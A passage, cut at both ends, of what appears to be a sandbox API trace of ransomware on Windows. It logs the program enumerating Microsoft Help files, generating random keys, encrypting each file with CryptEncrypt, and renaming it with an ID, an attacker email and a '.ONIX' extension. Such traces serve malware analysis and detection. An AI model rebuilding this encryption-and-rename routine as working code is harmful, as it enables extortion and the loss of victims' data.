lpOverlapped=0x0) returned 1 [0122.231] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-314, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.231] WriteFile (in: hFile=0x4d0, lpBuffer=0x464668*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x464668*, lpNumberOfBytesWritten=0x367f44c*=0x13a, lpOverlapped=0x0) returned 1 [0122.232] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x13a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.232] CloseHandle (hObject=0x4d0) returned 1 [0122.233] GetProcessHeap () returned 0x410000 [0122.233] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.233] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.236] GetProcessHeap () returned 0x410000 [0122.236] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.236] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xc997810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc997810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e3ad0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.ONENOTE.14.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1 [0122.236] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.236] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.236] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x152, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.236] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.236] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.237] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.237] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.237] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.237] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 57 [0122.237] GetProcessHeap () returned 0x410000 [0122.237] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0122.237] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" [0122.237] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.237] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=338) returned 1 [0122.237] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x152 [0122.237] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.237] GetProcessHeap () returned 0x410000 [0122.237] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.237] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.237] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.241] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.242] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.243] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x44faf8 [0122.243] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x442938 [0122.243] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.243] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.243] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.243] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.244] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x152, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.244] CloseHandle (hObject=0x4d0) returned 1 [0122.245] GetProcessHeap () returned 0x410000 [0122.245] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.245] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.onenote.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.247] GetProcessHeap () returned 0x410000 [0122.247] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.247] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2689510, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.14.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1 [0122.247] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.248] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.248] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x152, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.248] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.248] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.248] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.248] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.248] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.249] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 57 [0122.249] GetProcessHeap () returned 0x410000 [0122.249] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0122.249] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" [0122.249] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.249] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=338) returned 1 [0122.249] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x152 [0122.249] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.249] GetProcessHeap () returned 0x410000 [0122.249] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.249] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.249] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.253] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.255] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x44faf8 [0122.256] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x152) returned 0x442938 [0122.256] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.256] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.257] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.257] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x152, lpOverlapped=0x0) returned 1 [0122.258] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x152, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.258] CloseHandle (hObject=0x4d0) returned 1 [0122.258] GetProcessHeap () returned 0x410000 [0122.258] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.258] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.261] GetProcessHeap () returned 0x410000 [0122.261] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.261] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26af670, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.DEV.14.1033.hxn", cAlternateFileName="MSOUTL~2.HXN")) returned 1 [0122.261] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.261] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.261] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16a, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.262] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.262] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.262] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.262] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.262] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.262] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 61 [0122.262] GetProcessHeap () returned 0x410000 [0122.262] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x44faf8 [0122.262] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" [0122.262] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.262] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=362) returned 1 [0122.262] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x16a [0122.262] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.262] GetProcessHeap () returned 0x410000 [0122.262] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.262] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.262] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.266] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.267] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16a) returned 0x442938 [0122.268] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x16a) returned 0x46a0f0 [0122.268] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.268] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x16a, lpOverlapped=0x0) returned 1 [0122.268] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.268] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x16a, lpOverlapped=0x0) returned 1 [0122.270] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.270] CloseHandle (hObject=0x4d0) returned 1 [0122.270] GetProcessHeap () returned 0x410000 [0122.270] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.270] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.272] GetProcessHeap () returned 0x410000 [0122.272] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0122.272] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.14.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1 [0122.272] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.273] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.273] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x158, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.273] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.273] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.274] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.274] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.274] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.274] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 58 [0122.274] GetProcessHeap () returned 0x410000 [0122.274] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0122.274] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" [0122.274] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.274] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=344) returned 1 [0122.274] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x158 [0122.274] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.274] GetProcessHeap () returned 0x410000 [0122.274] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.274] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.274] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.278] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.279] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x158) returned 0x44faf8 [0122.280] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x158) returned 0x442938 [0122.280] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, 